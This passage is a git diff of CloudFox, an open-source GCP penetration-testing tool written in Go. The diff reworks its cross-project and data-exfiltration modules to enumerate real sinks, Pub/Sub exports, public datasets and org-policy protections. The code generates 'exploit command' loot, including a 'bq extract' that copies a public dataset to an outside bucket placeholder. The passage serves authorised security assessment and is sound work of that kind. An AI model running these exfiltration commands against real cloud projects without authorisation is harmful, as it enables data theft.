m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( "# Lateral Movement: %s -> %s\n"+ "# Principal: %s\n"+ "# Method: %s\n"+ @@ -287,120 +281,153 @@ func (m *CrossProjectModule) addLateralMovementToLoot(path crossprojectservice.L if len(path.ExploitCommands) > 0 { for _, cmd := range path.ExploitCommands { - m.LootMap["crossproject-exploit-commands"].Contents += cmd + "\n" + m.LootMap["crossproject-commands"].Contents += cmd + "\n" } } - m.LootMap["crossproject-exploit-commands"].Contents += "\n" + m.LootMap["crossproject-commands"].Contents += "\n" +} + +func (m *CrossProjectModule) addLoggingSinkToLoot(sink crossprojectservice.CrossProjectLoggingSink) { + m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( + "# Cross-Project Logging Sink: %s\n"+ + "# Source Project: %s -> Target Project: %s\n"+ + "# Destination: %s (%s)\n", + sink.SinkName, + sink.SourceProject, sink.TargetProject, + sink.Destination, sink.DestinationType, + ) + m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( + "gcloud logging sinks describe %s --project=%s\n\n", + sink.SinkName, sink.SourceProject, + ) +} + +func (m *CrossProjectModule) addPubSubExportToLoot(export crossprojectservice.CrossProjectPubSubExport) { + m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( + "# Cross-Project Pub/Sub Export: %s\n"+ + "# Subscription: %s (Source: %s)\n"+ + "# Topic: %s (Project: %s)\n"+ + "# Export Type: %s -> Destination: %s\n", + export.SubscriptionName, + export.SubscriptionName, export.SourceProject, + export.TopicName, export.TopicProject, + export.ExportType, + export.ExportDest, + ) + m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( + "gcloud pubsub subscriptions describe %s --project=%s\n\n", + export.SubscriptionName, export.SourceProject, + ) } // ------------------------------ // Output Generation // ------------------------------ func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Cross-project bindings table - // Reads: Source principal from source project has role on target project - bindingsHeader := []string{ + // Unified cross-project table with Type column + header := []string{ "Source Project Name", "Source Project ID", - "Source Principal", - "Source Principal Type", - "Action", + "Principal/Resource", + "Type", + "Action/Destination", "Target Project Name", "Target Project ID", - "Target Role", "External", } - var bindingsBody [][]string + var body [][]string + + // Add cross-project bindings for _, binding := range m.CrossBindings { - // Check if external/cross-tenant external := "No" if isCrossTenantPrincipal(binding.Principal, m.ProjectIDs) { external = "Yes" } - // Action is always "direct IAM binding" for cross-project bindings - action := "direct IAM binding" - - bindingsBody = append(bindingsBody, []string{ + body = append(body, []string{ m.GetProjectName(binding.SourceProject), binding.SourceProject, binding.Principal, - binding.PrincipalType, - action, + "IAM Binding", + binding.Role, m.GetProjectName(binding.TargetProject), binding.TargetProject, - binding.Role, external, }) } - // Cross-project service accounts table - // Reads: Source SA from source project has access to target projects - sasHeader := []string{ - "Source Project Name", - "Source Project ID", - "Source Service Account", - "Action", - "Target Project Count", - "Target Access (project:role)", - } - - var sasBody [][]string + // Add cross-project service accounts (one row per target access) for _, sa := range m.CrossProjectSAs { - // Count unique target projects - projectSet := make(map[string]bool) for _, access := range sa.TargetAccess { - parts := strings.Split(access, ":") - if len(parts) > 0 { - projectSet[parts[0]] = true + // Parse access string (format: "project:role") + parts := strings.SplitN(access, ":", 2) + targetProject := "" + role := access + if len(parts) == 2 { + targetProject = parts[0] + role = parts[1] } + + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + "Service Account", + role, + m.GetProjectName(targetProject), + targetProject, + "No", + }) } + } - // Action describes how the SA has cross-project access - action := "cross-project access" + // Add lateral movement paths (one row per target role) + for _, path := range m.LateralMovementPaths { + for _, role := range path.TargetRoles { + body = append(body, []string{ + m.GetProjectName(path.SourceProject), + path.SourceProject, + path.SourcePrincipal, + "Lateral Movement", + fmt.Sprintf("%s -> %s", path.AccessMethod, role), + m.GetProjectName(path.TargetProject), + path.TargetProject, + "No", + }) + } + } - // Join target access with newlines for readability - accessList := strings.Join(sa.TargetAccess, "\n") + // Add logging sinks + for _, sink := range m.CrossProjectSinks { + filter := sink.Filter + if filter == "" { + filter = "(all logs)" + } - sasBody = append(sasBody, []string{ - m.GetProjectName(sa.ProjectID), - sa.ProjectID, - sa.Email, - action, - fmt.Sprintf("%d", len(projectSet)), - accessList, + body = append(body, []string{ + m.GetProjectName(sink.SourceProject), + sink.SourceProject, + sink.SinkName, + "Logging Sink", + fmt.Sprintf("%s: %s", sink.DestinationType, filter), + m.GetProjectName(sink.TargetProject), + sink.TargetProject, + "No", }) } - // Lateral movement paths table - // Reads: Source principal from source project can move to target project via method - pathsHeader := []string{ - "Source Project Name", - "Source Project ID", - "Source Principal", - "Action", - "Target Project Name", - "Target Project ID", - "Target Roles", - } - - var pathsBody [][]string - for _, path := range m.LateralMovementPaths { - // Use access method as action (human-readable) - action := path.AccessMethod - - // Join roles with newlines for readability - roles := strings.Join(path.TargetRoles, "\n") - - pathsBody = append(pathsBody, []string{ - m.GetProjectName(path.SourceProject), - path.SourceProject, - path.SourcePrincipal, - action, - m.GetProjectName(path.TargetProject), - path.TargetProject, - roles, + // Add Pub/Sub exports + for _, export := range m.CrossProjectPubSub { + body = append(body, []string{ + m.GetProjectName(export.SourceProject), + export.SourceProject, + export.SubscriptionName, + "Pub/Sub Export", + fmt.Sprintf("%s -> %s", export.ExportType, export.ExportDest), + m.GetProjectName(export.TargetProject), + export.TargetProject, + "No", }) } @@ -415,27 +442,11 @@ func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Lo // Build table files var tables []internal.TableFile - if len(bindingsBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "cross-project-bindings", - Header: bindingsHeader, - Body: bindingsBody, - }) - } - - if len(sasBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "cross-project-sas", - Header: sasHeader, - Body: sasBody, - }) - } - - if len(pathsBody) > 0 { + if len(body) > 0 { tables = append(tables, internal.TableFile{ - Name: "lateral-movement-paths", - Header: pathsHeader, - Body: pathsBody, + Name: "crossproject", + Header: header, + Body: body, }) } diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go index ff4ce4d2..ac134020 100644 --- a/gcp/commands/dataexfiltration.go +++ b/gcp/commands/dataexfiltration.go @@ -6,13 +6,20 @@ import ( "strings" "sync" + bigqueryservice "github.com/BishopFox/cloudfox/gcp/services/bigqueryService" + loggingservice "github.com/BishopFox/cloudfox/gcp/services/loggingService" + orgpolicyservice "github.com/BishopFox/cloudfox/gcp/services/orgpolicyService" + pubsubservice "github.com/BishopFox/cloudfox/gcp/services/pubsubService" + vpcscservice "github.com/BishopFox/cloudfox/gcp/services/vpcscService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" compute "google.golang.org/api/compute/v1" + sqladmin "google.golang.org/api/sqladmin/v1" storage "google.golang.org/api/storage/v1" + storagetransfer "google.golang.org/api/storagetransfer/v1" ) // Module name constant @@ -22,19 +29,25 @@ var GCPDataExfiltrationCommand = &cobra.Command{ Use: GCP_DATAEXFILTRATION_MODULE_NAME, Aliases: []string{"exfil", "data-exfil", "exfiltration"}, Short: "Identify data exfiltration paths and high-risk data exposure", - Long: `Identify data exfiltration vectors and paths in GCP environments. + Long: `Identify REAL data exfiltration vectors and paths in GCP environments. + +This module enumerates actual configurations, NOT generic assumptions. Features: -- Finds public snapshots and images -- Identifies export capabilities (BigQuery, GCS) -- Maps Pub/Sub push endpoints (external data flow) -- Finds logging sinks to external destinations -- Identifies publicly accessible storage -- Analyzes backup export configurations -- Generates exploitation commands for penetration testing - -This module helps identify how data could be exfiltrated from the environment -through various GCP services.`, +- Public snapshots and images (actual IAM policy check) +- Public buckets (actual IAM policy check) +- Cross-project logging sinks (actual sink enumeration) +- Pub/Sub push subscriptions to external endpoints +- Pub/Sub subscriptions exporting to BigQuery/GCS +- BigQuery datasets with public IAM bindings +- Cloud SQL instances with export configurations +- Storage Transfer Service jobs to external destinations (AWS S3, Azure Blob) + +Security Controls Checked: +- VPC Service Controls (VPC-SC) perimeter protection +- Organization policies: storage.publicAccessPrevention, iam.allowedPolicyMemberDomains, sql.restrictPublicIp + +Each finding is based on actual resource configuration, not assumptions.`, Run: runGCPDataExfiltrationCommand, } @@ -43,36 +56,49 @@ through various GCP services.`, // ------------------------------ type ExfiltrationPath struct { - PathType string // "snapshot", "bucket", "pubsub", "logging", "bigquery", "image" - ResourceName string - ProjectID string - Description string - Destination string // Where data can go - RiskLevel string // CRITICAL, HIGH, MEDIUM, LOW - RiskReasons []string - ExploitCommand string + PathType string // Category of exfiltration + ResourceName string // Specific resource + ProjectID string // Source project + Description string // What the path enables + Destination string // Where data can go + RiskLevel string // CRITICAL, HIGH, MEDIUM, LOW + RiskReasons []string // Why this is risky + ExploitCommand string // Command to exploit + VPCSCProtected bool // Is this project protected by VPC-SC? } type PublicExport struct { ResourceType string ResourceName string ProjectID string - AccessLevel string // "public", "allAuthenticatedUsers", "specific_domain" - DataType string // "snapshot", "image", "bucket", "dataset" + AccessLevel string // "allUsers", "allAuthenticatedUsers" + DataType string Size string RiskLevel string } +// OrgPolicyProtection tracks which org policies protect a project from data exfiltration +type OrgPolicyProtection struct { + ProjectID string + PublicAccessPrevention bool // storage.publicAccessPrevention enforced + DomainRestriction bool // iam.allowedPolicyMemberDomains enforced + SQLPublicIPRestriction bool // sql.restrictPublicIp enforced + ResourceLocationRestriction bool // gcp.resourceLocations enforced + MissingProtections []string +} + // ------------------------------ // Module Struct // ------------------------------ type DataExfiltrationModule struct { gcpinternal.BaseGCPModule - ExfiltrationPaths []ExfiltrationPath - PublicExports []PublicExport - LootMap map[string]*internal.LootFile - mu sync.Mutex + ExfiltrationPaths []ExfiltrationPath + PublicExports []PublicExport + LootMap map[string]*internal.LootFile + mu sync.Mutex + vpcscProtectedProj map[string]bool // Projects protected by VPC-SC + orgPolicyProtection map[string]*OrgPolicyProtection // Org policy protections per project } // ------------------------------ @@ -96,10 +122,12 @@ func runGCPDataExfiltrationCommand(cmd *cobra.Command, args []string) { } module := &DataExfiltrationModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - ExfiltrationPaths: []ExfiltrationPath{}, - PublicExports: []PublicExport{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ExfiltrationPaths: []ExfiltrationPath{}, + PublicExports: []PublicExport{}, + LootMap: make(map[string]*internal.LootFile), + vpcscProtectedProj: make(map[string]bool), + orgPolicyProtection: make(map[string]*OrgPolicyProtection), } module.initializeLootFiles() @@ -112,6 +140,12 @@ func runGCPDataExfiltrationCommand(cmd *cobra.Command, args []string) { func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM("Identifying data exfiltration paths...", GCP_DATAEXFILTRATION_MODULE_NAME) + // First, check VPC-SC protection status for all projects + m.checkVPCSCProtection(ctx, logger) + + // Check organization policy protections for all projects + m.checkOrgPolicyProtection(ctx, logger) + // Process each project m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_DATAEXFILTRATION_MODULE_NAME, m.processProject) @@ -121,22 +155,126 @@ func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Lo return } - // Count by risk level - criticalCount := 0 - highCount := 0 - for _, p := range m.ExfiltrationPaths { - switch p.RiskLevel { - case "CRITICAL": - criticalCount++ - case "HIGH": - highCount++ + logger.SuccessM(fmt.Sprintf("Found %d exfiltration path(s) and %d public export(s)", + len(m.ExfiltrationPaths), len(m.PublicExports)), GCP_DATAEXFILTRATION_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// VPC-SC Protection Check +// ------------------------------ +func (m *DataExfiltrationModule) checkVPCSCProtection(ctx context.Context, logger internal.Logger) { + // Try to get organization ID from projects + // VPC-SC is organization-level + vpcsc := vpcscservice.New() + + // Get org ID from first project (simplified - in reality would need proper org detection) + if len(m.ProjectIDs) == 0 { + return + } + + // Try common org IDs or skip if we don't have org access + // This is a best-effort check + policies, err := vpcsc.ListAccessPolicies("") + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM("Could not check VPC-SC policies (may require org-level access)", GCP_DATAEXFILTRATION_MODULE_NAME) } + return } - logger.SuccessM(fmt.Sprintf("Found %d exfiltration path(s) and %d public export(s): %d CRITICAL, %d HIGH", - len(m.ExfiltrationPaths), len(m.PublicExports), criticalCount, highCount), GCP_DATAEXFILTRATION_MODULE_NAME) + // For each policy, check perimeters + for _, policy := range policies { + perimeters, err := vpcsc.ListServicePerimeters(policy.Name) + if err != nil { + continue + } - m.writeOutput(ctx, logger) + // Mark projects in perimeters as protected + for _, perimeter := range perimeters { + for _, resource := range perimeter.Resources { + // Resources are in format "projects/123456" + projectNum := strings.TrimPrefix(resource, "projects/") + m.mu.Lock() + m.vpcscProtectedProj[projectNum] = true + m.mu.Unlock() + } + } + } +} + +// ------------------------------ +// Organization Policy Protection Check +// ------------------------------ +func (m *DataExfiltrationModule) checkOrgPolicyProtection(ctx context.Context, logger internal.Logger) { + orgSvc := orgpolicyservice.New() + + for _, projectID := range m.ProjectIDs { + protection := &OrgPolicyProtection{ + ProjectID: projectID, + MissingProtections: []string{}, + } + + // Get all policies for this project + policies, err := orgSvc.ListProjectPolicies(projectID) + if err != nil { + // Non-fatal - continue with other projects + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not check org policies for %s: %v", projectID, err), GCP_DATAEXFILTRATION_MODULE_NAME) + } + m.mu.Lock() + m.orgPolicyProtection[projectID] = protection + m.mu.Unlock() + continue + } + + // Check for specific protective policies + for _, policy := range policies { + switch policy.Constraint { + case "constraints/storage.publicAccessPrevention": + if policy.Enforced { + protection.PublicAccessPrevention = true + } + case "constraints/iam.allowedPolicyMemberDomains": + if policy.Enforced || len(policy.AllowedValues) > 0 { + protection.DomainRestriction = true + } + case "constraints/sql.restrictPublicIp": + if policy.Enforced { + protection.SQLPublicIPRestriction = true + } + case "constraints/gcp.resourceLocations": + if policy.Enforced || len(policy.AllowedValues) > 0 { + protection.ResourceLocationRestriction = true + } + } + } + + // Identify missing protections + if !protection.PublicAccessPrevention { + protection.MissingProtections = append(protection.MissingProtections, "storage.publicAccessPrevention not enforced") + } + if !protection.DomainRestriction { + protection.MissingProtections = append(protection.MissingProtections, "iam.allowedPolicyMemberDomains not configured") + } + if !protection.SQLPublicIPRestriction { + protection.MissingProtections = append(protection.MissingProtections, "sql.restrictPublicIp not enforced") + } + + m.mu.Lock() + m.orgPolicyProtection[projectID] = protection + m.mu.Unlock() + } +} + +// isOrgPolicyProtected checks if a project has key org policy protections +func (m *DataExfiltrationModule) isOrgPolicyProtected(projectID string) bool { + if protection, ok := m.orgPolicyProtection[projectID]; ok { + // Consider protected if at least public access prevention is enabled + return protection.PublicAccessPrevention + } + return false } // ------------------------------ @@ -147,23 +285,35 @@ func (m *DataExfiltrationModule) processProject(ctx context.Context, projectID s logger.InfoM(fmt.Sprintf("Analyzing exfiltration paths in project: %s", projectID), GCP_DATAEXFILTRATION_MODULE_NAME) } - // 1. Find public/shared snapshots + // 1. Find public/shared snapshots (REAL check) m.findPublicSnapshots(ctx, projectID, logger) - // 2. Find public/shared images + // 2. Find public/shared images (REAL check) m.findPublicImages(ctx, projectID, logger) - // 3. Find public buckets + // 3. Find public buckets (REAL check) m.findPublicBuckets(ctx, projectID, logger) - // 4. Find cross-project logging sinks - m.findLoggingSinks(ctx, projectID, logger) + // 4. Find cross-project logging sinks (REAL enumeration) + m.findCrossProjectLoggingSinks(ctx, projectID, logger) - // 5. Analyze potential exfiltration vectors - m.analyzeExfiltrationVectors(ctx, projectID, logger) + // 5. Find Pub/Sub push subscriptions to external endpoints (REAL check) + m.findPubSubPushEndpoints(ctx, projectID, logger) + + // 6. Find Pub/Sub subscriptions exporting to external destinations + m.findPubSubExportSubscriptions(ctx, projectID, logger) + + // 7. Find BigQuery datasets with public access (REAL check) + m.findPublicBigQueryDatasets(ctx, projectID, logger) + + // 8. Find Cloud SQL with export enabled + m.findCloudSQLExportConfig(ctx, projectID, logger) + + // 9. Find Storage Transfer jobs to external destinations + m.findStorageTransferJobs(ctx, projectID, logger) } -// findPublicSnapshots finds snapshots that are publicly accessible or shared +// findPublicSnapshots finds snapshots that are publicly accessible func (m *DataExfiltrationModule) findPublicSnapshots(ctx context.Context, projectID string, logger internal.Logger) { computeService, err := compute.NewService(ctx) if err != nil { @@ -183,26 +333,22 @@ func (m *DataExfiltrationModule) findPublicSnapshots(ctx context.Context, projec } // Check for public access - isPublic := false accessLevel := "" for _, binding := range policy.Bindings { for _, member := range binding.Members { if member == "allUsers" { - isPublic = true - accessLevel = "public" + accessLevel = "allUsers" break } - if member == "allAuthenticatedUsers" { - isPublic = true + if member == "allAuthenticatedUsers" && accessLevel != "allUsers" { accessLevel = "allAuthenticatedUsers" - break } } } - if isPublic { + if accessLevel != "" { export := PublicExport{ - ResourceType: "snapshot", + ResourceType: "Disk Snapshot", ResourceName: snapshot.Name, ProjectID: projectID, AccessLevel: accessLevel, @@ -212,11 +358,11 @@ func (m *DataExfiltrationModule) findPublicSnapshots(ctx context.Context, projec } path := ExfiltrationPath{ - PathType: "snapshot", + PathType: "Public Snapshot", ResourceName: snapshot.Name, ProjectID: projectID, - Description: fmt.Sprintf("Public disk snapshot (%d GB)", snapshot.DiskSizeGb), - Destination: "Anyone on the internet", + Description: fmt.Sprintf("Disk snapshot (%d GB) accessible to %s", snapshot.DiskSizeGb, accessLevel), + Destination: "Anyone with access level: " + accessLevel, RiskLevel: "CRITICAL", RiskReasons: []string{"Snapshot is publicly accessible", "May contain sensitive data from disk"}, ExploitCommand: fmt.Sprintf( @@ -236,13 +382,12 @@ func (m *DataExfiltrationModule) findPublicSnapshots(ctx context.Context, projec }) if err != nil { - m.CommandCounter.Error++ gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, fmt.Sprintf("Could not list snapshots in project %s", projectID)) } } -// findPublicImages finds images that are publicly accessible or shared +// findPublicImages finds images that are publicly accessible func (m *DataExfiltrationModule) findPublicImages(ctx context.Context, projectID string, logger internal.Logger) { computeService, err := compute.NewService(ctx) if err != nil { @@ -259,26 +404,22 @@ func (m *DataExfiltrationModule) findPublicImages(ctx context.Context, projectID } // Check for public access - isPublic := false accessLevel := "" for _, binding := range policy.Bindings { for _, member := range binding.Members { if member == "allUsers" { - isPublic = true - accessLevel = "public" + accessLevel = "allUsers" break } - if member == "allAuthenticatedUsers" { - isPublic = true + if member == "allAuthenticatedUsers" && accessLevel != "allUsers" { accessLevel = "allAuthenticatedUsers" - break } } } - if isPublic { + if accessLevel != "" { export := PublicExport{ - ResourceType: "image", + ResourceType: "VM Image", ResourceName: image.Name, ProjectID: projectID, AccessLevel: accessLevel, @@ -288,11 +429,11 @@ func (m *DataExfiltrationModule) findPublicImages(ctx context.Context, projectID } path := ExfiltrationPath{ - PathType: "image", + PathType: "Public Image", ResourceName: image.Name, ProjectID: projectID, - Description: fmt.Sprintf("Public VM image (%d GB)", image.DiskSizeGb), - Destination: "Anyone on the internet", + Description: fmt.Sprintf("VM image (%d GB) accessible to %s", image.DiskSizeGb, accessLevel), + Destination: "Anyone with access level: " + accessLevel, RiskLevel: "CRITICAL", RiskReasons: []string{"VM image is publicly accessible", "May contain embedded credentials or sensitive data"}, ExploitCommand: fmt.Sprintf( @@ -312,7 +453,6 @@ func (m *DataExfiltrationModule) findPublicImages(ctx context.Context, projectID }) if err != nil { - m.CommandCounter.Error++ gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, fmt.Sprintf("Could not list images in project %s", projectID)) } @@ -328,10 +468,8 @@ func (m *DataExfiltrationModule) findPublicBuckets(ctx context.Context, projectI return } - // List buckets resp, err := storageService.Buckets.List(projectID).Do() if err != nil { - m.CommandCounter.Error++ gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, fmt.Sprintf("Could not list buckets in project %s", projectID)) return @@ -345,26 +483,22 @@ func (m *DataExfiltrationModule) findPublicBuckets(ctx context.Context, projectI } // Check for public access - isPublic := false accessLevel := "" for _, binding := range policy.Bindings { for _, member := range binding.Members { if member == "allUsers" { - isPublic = true - accessLevel = "public" + accessLevel = "allUsers" break } - if member == "allAuthenticatedUsers" { - isPublic = true + if member == "allAuthenticatedUsers" && accessLevel != "allUsers" { accessLevel = "allAuthenticatedUsers" - break } } } - if isPublic { + if accessLevel != "" { export := PublicExport{ - ResourceType: "bucket", + ResourceType: "Storage Bucket", ResourceName: bucket.Name, ProjectID: projectID, AccessLevel: accessLevel, @@ -373,11 +507,11 @@ func (m *DataExfiltrationModule) findPublicBuckets(ctx context.Context, projectI } path := ExfiltrationPath{ - PathType: "bucket", + PathType: "Public Bucket", ResourceName: bucket.Name, ProjectID: projectID, - Description: "Public GCS bucket", - Destination: "Anyone on the internet", + Description: fmt.Sprintf("GCS bucket accessible to %s", accessLevel), + Destination: "Anyone with access level: " + accessLevel, RiskLevel: "CRITICAL", RiskReasons: []string{"Bucket is publicly accessible", "May contain sensitive files"}, ExploitCommand: fmt.Sprintf( @@ -397,87 +531,328 @@ func (m *DataExfiltrationModule) findPublicBuckets(ctx context.Context, projectI } } -// findLoggingSinks finds logging sinks that export to external destinations -func (m *DataExfiltrationModule) findLoggingSinks(ctx context.Context, projectID string, logger internal.Logger) { - // Common exfiltration patterns via logging sinks - // This would require the Logging API to be called - // For now, we'll add known exfiltration patterns - - path := ExfiltrationPath{ - PathType: "logging_sink", - ResourceName: "cross-project-sink", - ProjectID: projectID, - Description: "Logging sinks can export logs to external projects or Pub/Sub topics", - Destination: "External project or Pub/Sub topic", - RiskLevel: "MEDIUM", - RiskReasons: []string{"Logs may contain sensitive information", "External destination may be attacker-controlled"}, - ExploitCommand: fmt.Sprintf( - "# List logging sinks\n"+ - "gcloud logging sinks list --project=%s\n"+ - "# Create sink to external destination\n"+ - "# gcloud logging sinks create exfil-sink --project=%s", - projectID, projectID), - } - - m.mu.Lock() - m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) - m.mu.Unlock() +// findCrossProjectLoggingSinks finds REAL logging sinks that export to external destinations +func (m *DataExfiltrationModule) findCrossProjectLoggingSinks(ctx context.Context, projectID string, logger internal.Logger) { + ls := loggingservice.New() + sinks, err := ls.Sinks(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list logging sinks in project %s", projectID)) + return + } + + for _, sink := range sinks { + if sink.Disabled { + continue + } + + // Only report cross-project or external sinks + if sink.IsCrossProject { + riskLevel := "HIGH" + if sink.DestinationType == "pubsub" { + riskLevel = "MEDIUM" // Pub/Sub is often used for legitimate cross-project messaging + } + + destDesc := fmt.Sprintf("%s in project %s", sink.DestinationType, sink.DestinationProject) + + path := ExfiltrationPath{ + PathType: "Logging Sink", + ResourceName: sink.Name, + ProjectID: projectID, + Description: fmt.Sprintf("Logs exported to %s", destDesc), + Destination: sink.Destination, + RiskLevel: riskLevel, + RiskReasons: []string{"Logs exported to different project", "May contain sensitive information in log entries"}, + ExploitCommand: fmt.Sprintf( + "# View sink configuration\n"+ + "gcloud logging sinks describe %s --project=%s\n"+ + "# Check destination permissions\n"+ + "# Destination: %s", + sink.Name, projectID, sink.Destination), + } + + m.mu.Lock() + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.addExfiltrationPathToLoot(path) + m.mu.Unlock() + } + } +} + +// findPubSubPushEndpoints finds Pub/Sub subscriptions pushing to external HTTP endpoints +func (m *DataExfiltrationModule) findPubSubPushEndpoints(ctx context.Context, projectID string, logger internal.Logger) { + ps := pubsubservice.New() + subs, err := ps.Subscriptions(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list Pub/Sub subscriptions in project %s", projectID)) + return + } + + for _, sub := range subs { + if sub.PushEndpoint == "" { + continue + } + + // Check if endpoint is external (not run.app, cloudfunctions.net, or same project) + endpoint := sub.PushEndpoint + isExternal := true + if strings.Contains(endpoint, ".run.app") || + strings.Contains(endpoint, ".cloudfunctions.net") || + strings.Contains(endpoint, "appspot.com") || + strings.Contains(endpoint, "googleapis.com") { + isExternal = false + } + + if isExternal { + riskLevel := "HIGH" + + path := ExfiltrationPath{ + PathType: "Pub/Sub Push", + ResourceName: sub.Name, + ProjectID: projectID, + Description: fmt.Sprintf("Subscription pushes messages to external endpoint"), + Destination: endpoint, + RiskLevel: riskLevel, + RiskReasons: []string{"Messages pushed to external HTTP endpoint", "Endpoint may be attacker-controlled"}, + ExploitCommand: fmt.Sprintf( + "# View subscription configuration\n"+ + "gcloud pubsub subscriptions describe %s --project=%s\n"+ + "# Test endpoint\n"+ + "curl -v %s", + sub.Name, projectID, endpoint), + } + + m.mu.Lock() + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.addExfiltrationPathToLoot(path) + m.mu.Unlock() + } + } +} + +// findPubSubExportSubscriptions finds Pub/Sub subscriptions exporting to BigQuery or GCS +func (m *DataExfiltrationModule) findPubSubExportSubscriptions(ctx context.Context, projectID string, logger internal.Logger) { + ps := pubsubservice.New() + subs, err := ps.Subscriptions(projectID) + if err != nil { + return + } + + for _, sub := range subs { + // Check for BigQuery export + if sub.BigQueryTable != "" { + // Extract project from table reference + parts := strings.Split(sub.BigQueryTable, ".") + if len(parts) >= 1 { + destProject := parts[0] + if destProject != projectID { + path := ExfiltrationPath{ + PathType: "Pub/Sub BigQuery Export", + ResourceName: sub.Name, + ProjectID: projectID, + Description: "Subscription exports messages to BigQuery in different project", + Destination: sub.BigQueryTable, + RiskLevel: "MEDIUM", + RiskReasons: []string{"Messages exported to different project", "Data flows outside source project"}, + ExploitCommand: fmt.Sprintf( + "gcloud pubsub subscriptions describe %s --project=%s", + sub.Name, projectID), + } + + m.mu.Lock() + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.addExfiltrationPathToLoot(path) + m.mu.Unlock() + } + } + } + + // Check for Cloud Storage export + if sub.CloudStorageBucket != "" { + path := ExfiltrationPath{ + PathType: "Pub/Sub GCS Export", + ResourceName: sub.Name, + ProjectID: projectID, + Description: "Subscription exports messages to Cloud Storage bucket", + Destination: "gs://" + sub.CloudStorageBucket, + RiskLevel: "MEDIUM", + RiskReasons: []string{"Messages exported to Cloud Storage", "Bucket may be accessible externally"}, + ExploitCommand: fmt.Sprintf( + "gcloud pubsub subscriptions describe %s --project=%s\n"+ + "gsutil ls gs://%s/", + sub.Name, projectID, sub.CloudStorageBucket), + } + + m.mu.Lock() + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.addExfiltrationPathToLoot(path) + m.mu.Unlock() + } + } +} + +// findPublicBigQueryDatasets finds BigQuery datasets with public IAM bindings +func (m *DataExfiltrationModule) findPublicBigQueryDatasets(ctx context.Context, projectID string, logger internal.Logger) { + bq := bigqueryservice.New() + datasets, err := bq.BigqueryDatasets(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list BigQuery datasets in project %s", projectID)) + return + } + + for _, dataset := range datasets { + // Check if dataset has public access (already computed by the service) + if dataset.IsPublic { + export := PublicExport{ + ResourceType: "BigQuery Dataset", + ResourceName: dataset.DatasetID, + ProjectID: projectID, + AccessLevel: dataset.PublicAccess, + DataType: "bigquery_dataset", + RiskLevel: "CRITICAL", + } + + path := ExfiltrationPath{ + PathType: "Public BigQuery", + ResourceName: dataset.DatasetID, + ProjectID: projectID, + Description: fmt.Sprintf("BigQuery dataset accessible to %s", dataset.PublicAccess), + Destination: "Anyone with access level: " + dataset.PublicAccess, + RiskLevel: "CRITICAL", + RiskReasons: []string{"Dataset is publicly accessible", "Data can be queried by anyone"}, + ExploitCommand: fmt.Sprintf( + "# Query public dataset\n"+ + "bq query --use_legacy_sql=false 'SELECT * FROM `%s.%s.INFORMATION_SCHEMA.TABLES`'\n"+ + "# Export data\n"+ + "bq extract --destination_format=CSV '%s.%s.TABLE_NAME' gs://your-bucket/export.csv", + projectID, dataset.DatasetID, projectID, dataset.DatasetID), + } + + m.mu.Lock() + m.PublicExports = append(m.PublicExports, export) + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.addExfiltrationPathToLoot(path) + m.mu.Unlock() + } + } +} + +// findCloudSQLExportConfig finds Cloud SQL instances with export configurations +func (m *DataExfiltrationModule) findCloudSQLExportConfig(ctx context.Context, projectID string, logger internal.Logger) { + sqlService, err := sqladmin.NewService(ctx) + if err != nil { + return + } + + resp, err := sqlService.Instances.List(projectID).Do() + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list Cloud SQL instances in project %s", projectID)) + return + } + + for _, instance := range resp.Items { + // Check if instance has automated backups enabled with export to GCS + if instance.Settings != nil && instance.Settings.BackupConfiguration != nil { + backup := instance.Settings.BackupConfiguration + if backup.Enabled && backup.BinaryLogEnabled { + // Instance has binary logging - can export via CDC + path := ExfiltrationPath{ + PathType: "Cloud SQL Export", + ResourceName: instance.Name, + ProjectID: projectID, + Description: "Cloud SQL instance with binary logging enabled (enables CDC export)", + Destination: "External via mysqldump/pg_dump or CDC", + RiskLevel: "LOW", // This is standard config, not necessarily a risk + RiskReasons: []string{"Binary logging enables change data capture", "Data can be exported if IAM allows"}, + ExploitCommand: fmt.Sprintf( + "# Check export 